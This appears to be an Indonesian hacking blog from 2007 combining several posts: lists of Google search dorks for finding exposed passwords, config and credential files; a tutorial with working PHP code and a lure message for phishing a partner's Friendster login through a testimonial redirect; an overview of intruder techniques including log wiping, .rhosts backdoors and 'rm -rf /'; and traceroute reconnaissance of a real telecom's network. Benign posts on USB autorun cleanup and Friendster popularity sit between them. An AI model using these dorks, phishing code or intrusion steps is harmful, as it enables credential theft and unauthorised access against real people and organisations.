Jumat, 28 Desember 2007

Trik Menggunakan Google

Kemungkinan ini akan bermanfaat dalam pemcarian di google

“” Intitle:” ialah sintaks perintah untuk membatasi pencarian yang hanya menghasilkan judul yang mengandung informasi pada topik yang
dimaksud. Sebagai contoh pada pencarian, “intitle:
password admin ” ( tanpa tanda kutip ). Pencarian akan mencari page yang mengandung kata ” password ” sebagai judulnya dengan prioritas utama “admin” .
Jika pada pencarian terdapat dua query pencarian utama, digunakan sintaks allintitle: untuk pencarian secara lengkap. Sebagai contoh pada pencarian “allintitle:admin mdb”. Maka pencarian akan dibatasi pada dua subjek utama judul yaitu “admin” dan “mdb”.
” inurl:” ialah sintaks perintah untuk membatasi pencarian yang hanya menghasilkan semua URL yang hanya berisi kata kunci informasi yang dimaksudkan. Sebagai contoh pencarian dalam pencarian,”inurl : database mdb”. Pencarian akan menghasilkan semua URL yang hanya mengandung informasi tentang “database mdb “.

Hal yang sama juga berlaku pada sintaks ini, jika terdapat dua query pencarian utama, digunakan sintaks “allinurl:” untuk mendapatkan list url tersebut.
Sebagai contoh pencarian “allinurl: etc/passwd” , pencarian akan menghasilkan URL yang mengandung informasi tentang “etc” dan “passwd”. Tanda garis miring slash (”/”) diantara dua kata etc dan passwd akan diabaikan oleh mesin pencari Google.
“site:” ialah sintaks perintah untuk membatasi pencarian suatu query informasi berdasarkan pada suatu situs atau domain tertentu. Sebagai contoh pada pencarian informasi: “waveguide site:itb.ac.id” (tanpa tanda kutip). Pencarian akan mencari topic tentang waveguide pada semua halaman yang tersedia pada domain itb.ac.id.
Baca Lanjutannya…!!!!!!
“cache:” akan menunjukkan daftar web yang telah masuk kedalam indeks database Google. Sebagai contoh:
“cache:deffcon.org”, pencarian akan memperlihatkan list yang disimpan pada Google untuk page deffcon.org

“filetype:” ialah sintaks perintah pada Google untuk pencarian data pada internet dengan ekstensi tertentu (i.e. doc, pdf or ppt etc). Sebagai contoh pada pencarian : “filetype:doc site:go.id confidental” ( tanpa tanda kutip). Pencarian akan menghasilkan file data dengan ekstensi “.doc” pada semua domain go.id yang berisi informasi “confidential”.
“link:” ialah sintaks perintah pada Google yang akan menunjukkan daftar list webpages yang memiliki link pada webpage special. Sebagai contoh:”link:www.securityfocus.com” akan menunjuukan daftar webpage yang memiliki point link pada page SecurityFocus.
“related:” sintaks ini akan memberikan daftar web pages yang serupa dengan web page yang di indikasikan.

Sebagai contoh: “related:www.securityfocus.com”, pencarian akan memberi daftar web page yang serupa dengan homepage Securityfocus.
“intext:” sintaks perintah ini akan mencari kata kata pada website tertentu. Perintah ini mengabaikan link atau URL dan judul halaman. Sebagai contoh :
“intext:admin” (tanpa tanda petik), pencarian akan menghasilkan link pada web page yang memiliki keyword yang memiliki keyword admin.
Beberapa query sintaks diatas akan sangat membantu dalam pencarian data dan informasi lebih detail.

Google dapat menjadi mesin pencari untuk menggali informasi tertentu dan rahasia, informasi yang tidak diperkirakan yang dapat memberitahukan sisi lemah suatu sistem. Hal tersebut yang dimanfaatkan oleh sebagian individu untuk melakukan penetrasi suatu server atau sistem informasi .
Sintaks “Index of ” dapat digunakan untuk mendapatkan situs yang menampilkan indeks browsing direktori.

Webserver dengan indeks browsing yang dapat diakses, berarti siapa saja dapat melakukan akses pada direktori webserver, seperti layaknya dapat dilakukan pada lokal direktori pada umumnya.

Pada kesempatan ini dipaparkan bagaimana penggunaan sintaks “index of” untuk mendapatkan hubungan pada webserver dengan direktori indeks browsing yang dapat diakses.. Hal tersebut merupakan sumber informasi yang sederhana dapat diperoleh, akan tetapi isi dari informasi seringkali merupakan informasi yang sangat penting. Informasi tersebut dapat saja berupa password akses atau data transaksi online dan hal yang sangat penting lainnya.
Dibawah ini merupakan beberapa contoh penggunaan sintaks ” indeks of” untuk mendapatkan informasi yang penting dan sensitive sifatnya.

ex :
Index of /admin
Index of /passwd
Index of /password
Index of /mail
“Index of /” +passwd
“Index of /” +password.txt
“Index of /” +.htaccess
“Index of /secret”
“Index of /confidential”
“Index of /root”
“Index of /cgi-bin”
“Index of /credit-card”
“Index of /logs”
“Index of /config”
“Index of/admin.asp
“Index of/login.asp

Mencari sistem atau server yang vulnerable menggunakan sintaks “inurl:” atau “allinurl:”
1. Menggunakan sintaks “allinurl:winnt/system32/” (dengan tanda petik ) akan menampilkan daftar semua link pada server yang memberikan akses pada direktori yang terlarang seperti “system32″. Terkadang akan didapat akses pada cmd.exe pada direktori “system32″ yang memungkinkan seseorang untuk mengambil alih kendali sistem pada server tersebut.

2. Menggunakan “allinurl:wwwboard/passwd.txt” ( dengan tanda petik ) akan menampilkan daftar semua link pada server yang memiliki kelemahan pada “wwwboard Password”. Pembahasan lebih lanjut tentang vulnerability “wwwboard Password” dapat dilihat pada site keamanan jaringan seperti http://www.securityfocus.com atau http://www.securitytracker.com

3. Menggunakan sintaks “inurl: bash history” (dengan tanda petik ) akan menampilkan daftar link pada server yang memberikan akses pada file “bash history” melalui web. File tersebut merupakan command history file yang mengandung daftar perintah yang dieksekusi oleh administrator, yang terkadang menyangkut informasi sensitive seperti password sistem. Seringkali password pada sistem telah dienkripsi, untuk mendapatkan password aslinya bentuk yang dienkripsi ini harus didekripsi menggunakan program password cracker. Lama waktu untuk mendapatkan hasil dekripsi tergantung dari keandalan program dan banyaknya karakter yang terenkripsi.

4. Menggunakan “inurl:config.txt” (dengan tanda petik) akan menampilkan daftar semua link pada server yang memberikan akses pada file “config.txt. File ini berisi informasi penting termasuk hash value dari password administrator dan proses autentifikasi dari suatu database.
Sintaks “inurl:” atau “allinurl:” dapat dikombinasikan dengan sintaks yang lainnya seperti pada daftar dibawah ini :

Inurl: /cgi-bin/cart32.exe
inurl:admin filetype:txt
inurl:admin filetype:db
inurl:admin filetype:cfg
inurl:mysql filetype:cfg
inurlasswd filetype:txt
inurl:iisadmin
inurl:auth_user_file.txt
inurlrders.txt
inurl:”wwwroot/*.”
inurl:adpassword.txt
inurl:webeditor.php
inurl:file_upload.php
inurl:gov filetype:xls “restricted”
index of ftp +.mdb allinurl:/cgi-bin/ +mailto allinurl:/scripts/cart32.exe allinurl:/CuteNews/show_archives.php
allinurl:/phpinfo.php
allinurl:/privmsg.php
allinurl:/privmsg.php
inurl:cgi-bin/go.cgi?go=*
allinurl:.cgi?page=*.txt
allinurul:/modules/My_eGallery
Mencari suatu sistem atau server yang memiliki kelemahan dengan sintaks “intitle:”
atau “allintitle:””

Penerapan Engineering Untuk Mendapatkan Password Di Friendster

Setelah mencari ide apa yang artikel apa yang harus dimasukan kedalam blog saya. akhirnya saya memutuskan untuk mencari artikel tentang cara menghacking password Friendster karena banyak teman - teman saya yang menyarankan untuk memasukan artikel tersebut agar mereka mudah untuk membacanya tanpa perlu memakai search engine segala. dan setelah goggling sejenak akhirnya saya dapat juga di dalam memori ilmu hack saya.

nah ini dia selamat membaca. [Andy];)

Artikel ini ditujukan bahwa ” Hacking tidak selamanya menggunakan TOOLS “. So bagi para 3133t sebaiknya tidak membaca ARTIKEL ini jika anda tidak ingin mual, perut kembung, bibir pecah2, kepala senut2.. :Pdll.

Artikel ini diperuntunkan bagi anda tertarik, cinta, haus ilmu dari Social Engineering….

Sekali lagi Artikel ini hanya ditujukan bagi temen2 yg belum mengetahui teknik ini. Jika temen2(terutama for 3133t) Sudah tahu teknik ini SAYA MOHON STOP!! STOP!! STOP!! STOP!! STOP!! STOP!! tetapi bila anda tetap sja Ngotot ingin meneruskan saya tidak bisa memaksa anda…

Lanjutt ….

Akhir-akhir ini banyak yg membicarakannya, bahkan sedang menjadi berita hangat. Mngkin para 3133t sudah menemukannya hampir 2 tahun yg lalu. Sebagaimna telah dijelaskan pada artikel sebelumnya (WuPz, jagonya dll). Testimonial Redirect bisa jadi berabe bgt kalo disalah gunakan. Artinya?? cara tersebut bisa digunain buat ngedapetin password, cookies, or perhatian lebih dari doi ama kita ;)) n laen-laen .. :P.

So langsung saja kita menuju acara puncak …

Pertama-tama yg mesti kita siapin :

1. Teh manis penghangat malam.
2. Jangan Lupa cemilan yg bikin Kriuk .. kriuk …
3. Web Hosting yg support PHP. Cari di paman Google banyak..
4. Upload file index.htm (ada di source).

5. Sertakan code php dan JavaScript di bawah ini dan ” SAVE As ” sesuai dg nama link yg dituju pada Form Login.

$email = $_POST[email];
$password = $_POST[password];
$fl = fopen(’password.txt’, ‘a’);
fwrite($fl, “$email . $password \n\n”);
fclose($fl);

?>

Dan upload file diatas ke www.webyangsupportphp.com

6. Buat file Text kosong dengan nama Sesuai perintah Open pada php code di atas. Jangan lupa CHMOD diganti sesuai dg kebutuhan kamu!!.

7. kirim testi dg :

hai syang .. gimna kabarna, kagen nie ..

nah .. Setelah sang pacar penerima testi membuka “New Testimonials”, maka sesuai dg perintah yang berada di JavaScript => window.location <= yg disisipkan maka link akan menuju ke http://webyangsupportphp.com/index.htm . setelah terbuka, secara tanpa sadar sang pacar mengira halaman yg terbuka adalah sungguhan. Ya !!!! tanpa disuruh, dibelai-belai, n tanpa rayuan maut pun sang pacar akan dg rela hati mengisi Form login tipuan.
Akhirnya dg pura-pura tidak tahu, muka bego, sedikit bodoh. Si pengirim testi menawarkan jasanya untuk sang pacar tercinta… :P=] :))

Selain itu teknik diatas akan terlihat seperti aslinya jika menggunakan ” OVERLAY GENERATOR ” pada profil fs pada saat pengiriman testimonial yg berisi html code ( index.htm). Dg mengganti link Relatif menjadi absolut(baca S.I.H lebih lanjut) pada form login di index.htm maka pada saat pengiriman data akan menuju ke http://webyangsupportphp.com/login.php

Kesimpulan :

# Hacking tidak selamanya menggunakan ” TOOLS “
# Kelemahan XSS merupakan bahaya besar
# Teknik ini semata-mata hanya untuk pengetahuan. Resiko ditanggung anda sendiri !!!!

Kamis, 27 Desember 2007

Trik Menjadi Terkenal Di Friendster

Andy: ^_^


Ini buat para Friendstergenic dan para Friendsterholic yang tergila-gila dengan friendster. Berikut tips petunjuk singkat yang bisa kamu praktekkan untuk menjadi popular dan terkenal di friendster layaknya selebritis.

[1] Pastikan tampilan profil friendster kamu sangat unik dan menarik. Kamu bisa merancang sendiri tampilannya dengan mengotak-atik kode CSS nya atau kamu bisa gunakan yang sudah jadi dan siap pakai. Kamu bisa liat di Friendster-Layout.com ato buka-buka lagi halaman blog ini.

[2] Langkah selanjutnya adalah tentang isi profile kamu sendiri. Pastikan kamu menuliskan dengan jelsa, singkat dan dengan kata-kata yang enak didengar serta kata-kata yang gak terlalu formal. Pilih kata yang lebih familiar, juga jangan terlalu banyak menggunakan bahasa gaul. Deskripsikan tentang dirimu dengan jelas agar si pembaca bisa cepat merasa nyaman dan familiar dengan yang punya profile. Ingat jangan terlalu jaim dan sombong.

[3] Pastikan profile kamu terlihat ringkas, padat tapi simple. Kamu bisa menambahkan beberapa video dari youtube, ato menambahkan slidehow di bagian Now Playing section dengan embed.

[4] Bagaimana dengan teman alias Friends? haha..oke ini adalah bagian pentingnya dari bisnis perFriendster-an ini. namanya juga Friendster, jadi intinya kan semua tentang pertemanan (friendster=Pertemanan). Saat seseorang menambahkan teman baru (invite / add friends) itu berarti seseorang tersebut tertarik. So kalo ada seseorang yang meng-add FSmu sebagai teman (friends)nya berarti orang tersebut memiliki rasa ketertarikan untuk tahu lebih banyak lagi tentang kamu. So jangan lupa setelah melakukan Approve kamu kirimi dia testi/comment mengatakan terimakasih telah di add ato thanks for adding me ato apa kek terserah bagaimana kamu merangkai katanya. Kalo bisa jangan lupa mengucapkan "keep in touch with me" biar mereka (friends) merasa kamu perhatikan.

[5] Nah saat orang tersebut membalas testimu kembali, berarti itu adalah sebuah awal yang bagus untuk menjalin pertemanan dengannya.

[6] Yang terpenting jangan sampai kamu acuhkan setiap ada orang yang memberimu testimonial alias comment, langsung balas saat kamu sempat.

[7] Sebagai penutup jangan bersikap terlalu naif dengan menjadi terlalu sombong atau bahkan terlihat terlalu sengsara (pathetic). Usahakan tetap nice dan cool alias keren. Nah kalo itu semua belum membuat kamu sukses..

Hubungin Aq Di Andy_Dn_Angel@Yahoo.Co.Id

Membuat Flashdisk Aman Dari Autorun-Nya Si-Virus

Andy: ^_^

Tentunya teman2 semuanya sudah mengetahui bhw virus2 dapat menularkan dirinya ke komputer2 lain dengan media flashdisk. -.-“. Kesal? Sudah pasti! Saya juga merasakan perasaan yang sama ketika komputer saya juga ikut2an kena virus… tapi saya punya cara yang ampuh agar virus yang ada di flashdisk tersebut tidak dapat menularkan dirinya ke komputer lain..

Baiklah saya akan mulai membahasnya sekarang, diawali dengan cara penularan virus lewat media flashdisk. Sebenarnya sangat simple, ketika flashdisk dicolokan kedalam port usb virus yang sedang berjalan tinggal men-copy dirinya sendiri ke dalam flashdisk, dan tidak lupa pula dengan membuat file “autorun.inf” yang letak file-nya kasat mata sehingga tidak dapat dilihat. nah… file inilah yang akan kita edit agar virusnya tidak dapat menjalankan dirinya di komputer kita.

Cara yang pertama dengan mengedit secara manual dengan menggunakan notepad atau wordpad. Diasumsikan flashdisk kita yang telah dicolokan kedalam komputer (yang telah terinfeksi) beralamat “F:\”, maka saya akan mencoba membuka file “F:\autorun.inf” lalu enter. Lalu notepad akan terbuka secara otomatis dengan beberapa mantra didalamnya, setelah itu kita tinggal mengedit mantra tersebut dengan memblock semua mantra tersebut(ctrl+a) lalu hapus(backspace atau del) lalu anda bisa membiarkannya kosong lalu tekan ctrl+s untuk men-savenya. Anda juga bisa menuliskan beberapa puisi indah tentang perdamaian didalamnya ^-^.

Tetapi bang blckflcn, bagaimana jika file tersebut memiliki attribute “read-only”? yang jelas kita tidak dapat mengeditnya secara manual!(aaaaarrrrrgh!!!!). Lalu? Apa yang dapat kita lakukan… bang blckflcn? Gigi dibalas dengan gigi, mata dibalas dengan mata, dan yah… anda benar! MANTRA juga DIBALAS DENGAN MANTRA!! Mantranya sangatlah mudah… saya akan membahasnya secara bertahap sekarang juga :

1)buka aplikasi notepad (tempat dimana kita akan menulis mantra)

2)tuliskan mantra “del /a:r f:\autorun.inf” (tnp tanda petik) lalu enter.

3)langkah selajutnya adalah tulis mantra lagi! Mantranya “echo ‘terserah tulisan apa’ >f:\autorun.inf&attrib +r f:\autorun.inf” (tnp tanda petik juga).

4)lalu save file mantra tersebut dengan nama file terserah anda dan path-nya terserah anda juga, tetapi extension-nya harus “.bat”(harus tidak boleh tidak)

5)lalu jalankan file mantra yang baru kita buat tersebut

6)buka explorer

7)pada bagian address tuliskan “F:\autorun.inf”, lalu tekan enter sambil mengucapkan “sim…salabim…”. Maka aplikasi notepad akan muncul lagi sambil menampilkan beberapa tulisan, tetapi yang ini jelas bukan mantra ^-^.

Setelah beberapa step tadi, virus tidak dapat menjalankan dirinya di komputer lain ketika kita mencolokan flashdisk kita kedalam port usb-nya. Tetapi bang blckflcn, virus2 dari komputer yang terinfeksi tersebut masih ada di dalam flashdisk saya. Bagaimana ini? Yah, itu sih bukan tugas saya lagi. Itu sih sudah menjadi tugas anti-virus… saya hanya memberitahukan cara agar virusnya tidak berjalan ketika flashdisk kita dicolokan kedalam port usb pada komputer yang lain… lagian mantra yang saya punya masih belum begitu ampuh untuk membuat virus tidak berjalan di komputer. Oleh karena itu, saya akan belajar tentang mantra2 tersebut di hogwarts agar lebih ampuh. Hehehe… ^-^.

Sabtu, 10 November 2007

Teknik Mengcrack

Andy: ^_^

Dalam tulisan ini saya coba ketengahkan beberapa teknik yang umumnya digunakan teman-teman untuk melakukan crack ke sistem komputer. Referensi-nya bisa dibaca di

Salah satu referensi menarik lainnya adalah artikel dari Front-line Information Security Team, "Techniques Adopted By 'System Crackers' When Attempting To Break Into Corporate or Sensitive Private Networks," fist@ns2.co.uk & http://www.ns2.co.uk

Lembaga apa saja sebetulnya yang biasanya rentan terhadap serangan cracker ini? Ada cukup banyak sebetulnya mulai dari:

  • institusi finansial & bank
  • Internet service provider (ISP)
  • Perusahaan farmasi
  • Lembaga pemerintah & pertahanan
  • Perusahaan multinasional

Para cracker ini profile-nya seperti apa? Jika kita perhatikan baik-baik maka umumnya mereka adalah pria berusia antara 16-25 tahun. Mereka umumnya melakukan cracking untuk meningkatkan kemampuan cracking mereka atau untuk menggunakan resource yang ada di jaringan untuk keperluan pribadinya. Umumnya mereka ada opportunis yang secara untung-untung menscan sistem untuk melihat lubang dari sistem. Umumnya setelah berhasil memasuki sistem yang dimaksud kemudian mengambil akses administrator (root) dari sistem tersebut; kemudian membuat akses backdoor agar dikemudian hari dapat memasuki sistem tersebut lagi sambil menutup berbagai lubang security yang ada supaya cracker lain tidak bisa memanfaatkan sistem yang dia kuasai ini.

Sebelum memasuki berbagai teknik yang dipakai oleh para cracker untuk menguasai sistem ada baiknya kita melihat secara sepintas saja metoda apa saja yang digunakan oleh berbagai perusahaan ini untuk menyambungkan ke Internet. Secara sederhana umumnya berbagai perusahaan / instansi menyambung ke Internet menggunakan teknik-teknik firewall dan proxy server untuk akses bagi anggota / karyawan / siswanya agar bisa akses bersama melalui satu saluran komunikasi. Adapun hubungan ke Internet umumnya digunakan untuk hosting webserver, servis e-mail agar bisa berhubungan dengan dunia luar dan memberikan akses ke Internet bagi perusahaan / anggota / siswa.

Dalam setup jaringan komputer yang demikian umumnya webserver bukanlah tempat yang cukup menarik untuk di serang jika kita menginginkan akses ke informasi yang ada dalam corporate network. Kalaupun seorang cracker menyerang webserver umumnya digunakan untuk mengubah file yang ada untuk menjatuhkan citra perusahaan / lembaga. Bagi cracker yang berkeinginan untuk memasuki intranet corporate maka serangan akan dilakukan ke server e-mail karena biasanya server e-mail yang mempunyai saluran secara langsung ke dalam intranet untuk bertukar e-mail antara dunia intranet dan dunia internet. Bagi cracker yang cukup canggih maka serangan akan dilakukan pada router menggunakan scanner secara agresif terhadap protokol managemen SNMP yang akhirnya bisa mengubah router yang ada menjadi jembatan mereka memasuki intranet dari internet.

Setelah mengetahui berbagai modus yang ada di atas mari kita bahas sedikit lebih detail tentang cara mereka menyerang. Teknik pertama yang perlu dilakukan oleh para cracker ini adalah teknik ‘cloak’ yang pada dasarnya menyembunyikan diri pada saar menyerang agar administrator jaringan di ujung sebelah sana tidak menyadari bahwa mesin-nya sedang di serang. Teknik ‘cloak’ yang biasanya digunakan oleh para cracker ini adalah:

  • Melakukan bouncing (melompat) dari mesin yang sebelumnya telah di serang melalui program telnet atau remote shell rsh.
  • Melakukan bouncing (melompat) dari mesin yang menjalankan windows melalui software wingate mereka.
  • Melakukan bouncing (melompat) dari server proxy yang salah di konfigurasinya.

Seorang cracker pada saat menyerang harus mengumpulkan banyak informasi tentang jaringan yang akan dia serang. Beberapa teknik yang umumnya digunakan untuk mengumpulkan informasi tersebut biasanya dijalankan di perangkat Unix (bukan windows) yang antara lain adalah:

  • Menggunakan perangkat lunak nslookup dalm memberikan perintah ‘ls .
  • Melihat file HTML di server Web anda untuk mengidentifikasi host lain di intranet anda.
  • Melihat berbagai dokumen yang ada di server file (FTP) anda.
  • Melakukan hubungan ke server mail anda menggunakan perintah ‘telnet host 25’ dan memberikan perintah ‘expn ’.
  • Mem-‘finger’ pengguna yang memiliki account di mesin yang terbuka di internet.

Selanjutnya adalah mengidentifikasi komponen jaringan apa saja yang di set sebagai komponen yang paling di percaya di jaringan intranet perusahaan tersebut. Biasanya mesin yang digunakan administrator atau server biasanya dipercaya sebagai mesin paling aman di jaringan. Untuk melihat mesin mana yang di anggap paling aman di jaringan biasanya para cracker ini start dengan melihat men-cek daftar export dari Network File System (NFS) ke directory /usr/bin, /etc dan /home dimesin mana saja dilakukan operasi NFS tersebut. Jika bisa mengakses webserver maka bisa juga mengeksploitasi kelemahan Common Gateway Internet (CGI) untuk mengakses file /etc/hosts.allow.

Setelah melihat mesin mana yang dianggap paling aman / paling bisa dipercaya di jaringan intranet yang ingin kita serang. Langkah selanjutnya adalah mengidentifikasi kelemahan mesin-mesin tersebut. Ada beberapa program yang umumnya bersifat public domain & bisa secara mudah + gratisan di ambil di internet yang bisa digunakan untuk melakukan operasi tersebut, beberapa diantara program di Linux untuk keperluan tersebut adalah ADMhack, mscan, nmap & banyak scanner kecil. Biasanya agar administrator mesin tidak mengetahui bahwa kita melakukan scanning tersebut maka program ini di sembunyikan di balik program ‘ps’ atau ‘netstat’. Jika router di institusi / lembaga lawan tersebut ternyata mengaktifkan kemampuan agar bisa dimanage jarak jauh menggunakan protokol SNMP maka cracker yang lebih canggih bisa mengaktifkan teknik scanning SNMP yang bisa menguasai router tersebut.

Beberapa hal yang biasanya di cek pada saat melakukan scanning pada sebuah alat di jaringan komputer antara lain adalah:

  • Scan port TCP dari sebuah mesin.
  • Melihat servis RPC yang dijalankan menggunakan portmapper.
  • Melihat daftar export melalui nfsd.
  • Melihat daftar directory yang di share melalui samba / netbios.
  • Melakukan banyak finger untuk mengidentifikasi account default.
  • Scan kelemahan Common Gateway Interface (CGI).
  • Identifikasi kelemagan berbagai software server yang dijaankan di mesin seperti, sendmail, IMAP, POP3, RPC status & RPC mountd.

Setelah mengetahui kelemahan sistem, cracker tinggal mengambil alih sistem sistem dengan menjalankan program dari jauh untuk mengeksploit kelemahan software daemon server untuk memperoleh akses administrator / root dari mesin anda. Setelah cracker berhasil memperoleh akses ke peralatan yang lemah tadi maka cracker umumnya melakukan operasi pembersihan ‘clean up’ terhadap file log agar tidak terlihat oleh si administrator mesin tentang apa yang dilakukan oleh si cracker. Kemudian cracker akan memasang software / program yang diperlukan untuk membuat ‘backdoor’ agar dikemudian hari dapat mengakses sistem tersebut. Memasang .rhosts file di /usr/bin agar dikemudian hari dapat menjalankan program di mesin yang sudah dikuasai menggunakan perintah rsh & csh dari jauh saja.

Pada titik ini sebetulnya mesin sudah dikuasai tinggal dimanfaatkan saja. Ada banyak hal yang bisa dilakukan oleh cracker dalam memanfaatkan mesin yang sudah dia kuasai, antara lain:

  • Menjadikan jembatan antara Internet dengan intranet network.
  • Menginstalasi sniffer untuk melihat traffic yang sedang berjalan di LAN Corporate network di situ bisa dilihat berbagai password, nomor kartu kredit kalau tidak dilindungi. Program cpm di http://www.cert.org/ftp/tools/cpm mungkin bisa membantu memperbaiki interface yang dipasangi sniffer ini.
  • Yang paling sial kalau cracker menjalankan perintah ‘rm –rf /&’ karena mesin akan hancur lebur. Anda akan membutuhkan waktu beberapa jam s/d beberapa bulan untuk memperbaikinya kalau anda tidak pernah memback-up setting anda. Hal ini akan sangat berbahaya jika dijalankan di mesin-mesin yang menjalankan operasi ‘mission critical’ misalnya server di perbankan dll.

Kamis, 08 November 2007

Teknik Mengintai Jaringan Lawan

Ndy:

Langkah ke empat (4) terakhir dalam proses footprinting adalah melakukan pengintaian jaringan lawan, dalam bahasa Inggris-nya adalah network reconnaissance. Proses pengintaian dapat dilakukan dengan menggunakan perangkat lunak traceroute (di UNIX / Linux), atau menggunakan tracert (di Windows).

Traceroute merupakan perangkat lunak diagnostik yang pertama kali di kembangkan oleh salah satu sesepuh Internet yaitu Van Jacobson. Dengan mengakali parameter Time To Live (TTL) di paket IP agar setiap router yang dilewati mengirimkan berita ICMP_TIME_EXCEEDED, kita dapat memetakan route yang diambil oleh sebuah paket dalam jaringan Internet.

Sebagai contoh kita akan melihat hasil traceroute ke beberapa mesin yang ada di lingkungan jaringan Telkom, seperti www.telkom.co.id, www.plasa.com, in-mta1.telkom.co.id. Proses traceroute saya lakukan menggunakan sambungan dial-up menggunakan ISP indo.net.id pada kecepatan 19.2Kbps karena kebetulan memang kabel telepon di rumah saya tidak terlalu baik. Mari kita lihat beberapa kesimpulan dari peta yang kita peroleh.

[root@gate onno]# traceroute www.plasa.com

traceroute to www.plasa.com (202.134.0.172), 30 hops max, 38 byte packets

1 Digital-Tc.indo.net.id (202.159.33.29) 187.690 ms 189.692 ms 189.757 ms

2 Subnet-Gateway.indo.net.id (202.159.33.32) 189.820 ms 178.021 ms 179.822 ms

3 Loral-Gateway.indo.net.id (202.159.32.1) 189.840 ms 199.950 ms 182.850 ms 4 202.148.63.65 (202.148.63.65) 216.687 ms * 219.695 ms

5 * * 198.32.204.83 (198.32.204.83) 300.194 ms

6 * s2-4-gw1.gcc.jakarta.telkom.net.id (202.134.3.241) 490.050 ms 409.613 ms

7 * FE11-0-0.sm2.jakarta.telkom.net.id (202.134.3.149) 300.095 ms 309.653 ms

8 GigaE5-0.1.emm.jakarta.telkom.net.id (202.134.3.174) 349.822 ms 299.629 ms *

9 www.plasa.com (202.134.0.136) 400.178 ms 389.508 ms *

Tampaknya www.plasa.com berada di Jakarta, karena memlalui beberapa mesin / router penting Telkom yang ada di Jakarta; mesin gcc, sm2 kemungkinan ada di Semanggi / Sentral telkom di Gatot Subroto – yah itu hanya tebakan dari gaya penamaan mesin Telkom yang kemungkinan mengambil referensi pola penamaan tempat cara abri yang agak kriptik tapi terprediksi Waktu yang dibutuhkan untuk mengirimkan paket & dikembalikan lagi oleh www.plasa.com adalah sekitar 400 mili detik.

[root@gate onno]# traceroute in-mta1.telkom.co.id

traceroute to in-mta1.telkom.co.id (202.134.0.196), 30 hops max, 38 byte packets 1 Digital-Tc.indo.net.id (202.159.33.29) 507.252 ms 489.515 ms 509.857 ms

2 * Subnet-Gateway.indo.net.id (202.159.33.32) 200.130 ms 199.694 ms

3 Loral-Gateway.indo.net.id (202.159.32.1) 199.793 ms 189.703 ms 189.889 ms

4 202.148.63.65 (202.148.63.65) 389.829 ms 269.620 ms *

5 * * *

6 s2-4-gw1.gcc.jakarta.telkom.net.id (202.134.3.241) 869.655 ms 669.665 ms

559.793 ms

7 FE11-0-0.sm2.jakarta.telkom.net.id (202.134.3.149) 489.828 ms 419.716 ms *

8 GigaE5-0.1.emm.jakarta.telkom.net.id (202.134.3.174) 369.912 ms 219.670 ms 219.859 ms

9 in-mta2.plasa.com (202.134.0.196) 339.852 ms 239.796 ms 289.778 ms

Secara tidak sengaja kita bisa melihat ternyata in-mta1.telkom.co.id adalah juga in-mta2.plasa.com, artinya semua mail ke orang telkom dengan hostname telkom.co.id akan bisa di tangkap di in-mta2.plasa.com juga. Ini agak berbahaya sebetulnya untuk sebuah perusahaan seperti Telkom. Tampaknya in-mta2.plasa.com, in-mta1.telkom.co.id & www.plasa.com berada dalam sebuah keluarga jaringan 202.134.0.x. Jika kita mengetahui struktur organisasi Telkom, berarti 202.134.0.x merupakan tempat penyimpanan mesin-mesin yang dikelola oleh Divisi Multimedia yang mengelola plasa.com.

[root@gate onno]# traceroute www.telkom.net.id

traceroute to www.telkom.net.id (202.134.0.12), 30 hops max, 38 byte packets

1 Digital-Tc.indo.net.id (202.159.33.29) 197.334 ms 189.571 ms 189.805 ms

2 Subnet-Gateway.indo.net.id (202.159.33.32) 199.799 ms 189.752 ms 189.969

ms

3 Loral-Gateway.indo.net.id (202.159.32.1) 189.734 ms 199.678 ms 189.795 ms

4 202.148.63.65 (202.148.63.65) 249.844 ms 316.807 ms 289.855 ms

5 * * *

6 * s2-4-gw1.gcc.jakarta.telkom.net.id (202.134.3.241) 260.189 ms 299.710 ms

7 * FE11-0-0.sm2.jakarta.telkom.net.id (202.134.3.149) 320.187 ms 319.636 ms

8 * GigaE5-0.1.emm.jakarta.telkom.net.id (202.134.3.174) 330.246 ms *

9 game.plasa.com (202.134.0.12) 460.078 ms * 420.131 ms

Ah semakin yakin saja kita, dari hasil traceroute www.telkom.net.id terlihat sekali bahwa ternyata www.telkom.net.id ternyata identik dengan game.plasa.com. Jelas bahwa semua keluarga besar plasa.com & telkom.net.id adalah servis TelkomNet yang merupakan bagian dari servis Divisi Multimedia PT. Telkom; termasuk tentunya TelkomNet Instant yang sering menjadi bulan-bulan ISP Indonesia yang lain yang menunjukan ketidak adilan (ketidak fairan) Telkom dalam memberikan servis di Indonesia.

Menarik untuk di simak ternyata Divisi Multimedia memegang keluarga IP 202.134.0.x sangat predictable sekali karena logikanya 202.134.x.x kemungkinan besar adalah keluarga IP-nya PT. Telkom, dan nomor terkecil (0) di ambil oleh penyelenggara / operator-nya, yaitu Divisi Multimedia. Dari hasil traceroute juga terlihat bahwa jaringan backbone / router utama Telkom tampaknya menggunakan keluarga IP 202.134.3.x.

Selanjutnya kita mencoba melihat bagaimana dengan kantor pusat PT. Telkom Indonesia di Bandung. Mari kita lihat hasil traceroute ke www.telkom.co.id yang tampaknya berada di kantor pusat PT. Telkom di Bandung.

[root@gate onno]# traceroute www.telkom.co.id

traceroute to www.telkom.co.id (202.134.2.15), 30 hops max, 38 byte packets

1 Digital-Tc.indo.net.id (202.159.33.29) 341.254 ms 189.285 ms 189.863 ms

2 Subnet-Gateway.indo.net.id (202.159.33.32) 389.814 ms 539.738 ms 339.843 ms

3 Loral-Gateway.indo.net.id (202.159.32.1) 379.842 ms 189.737 ms 629.806 ms

4 * * *

5 198.32.204.83 (198.32.204.83) 520.177 ms 529.823 ms 489.612 ms

6 * * s2-4-gw1.gcc.jakarta.telkom.net.id (202.134.3.241) 490.196 ms

7 * FE11-0-0.sm2.jakarta.telkom.net.id (202.134.3.149) 720.213 ms *

8 * * *

9 * * fe-sm2.jakarta.telkom.net.id (202.134.3.179) 599.379 ms

10 s0-lembong.bandung.telkom.net.id (202.134.3.38) 719.669 ms 659.553 ms S4.lbg.bandung.telkom.net.id (202.134.3.50) 529.925 ms

11 192.168.16.250 (192.168.16.250) 765.193 ms 859.890 ms *

12 202.134.2.15 (202.134.2.15) 1070.083 ms 769.732 ms *

Dari hasil traceroute ke www.telkom.co.id ada yang menggelitik hati saya, ternyata ada router di IntraNet Telkom menggunakan IP 192.168.16.250 yang tampak ke jaringan public. Ini terus terang, agak menyalahi pakem untuk mendisain jaringan yang baik. Router yan menjadi firewall ke jaringan IntraNet telkom tampaknya ber-alamat IP 202.134.3.50.

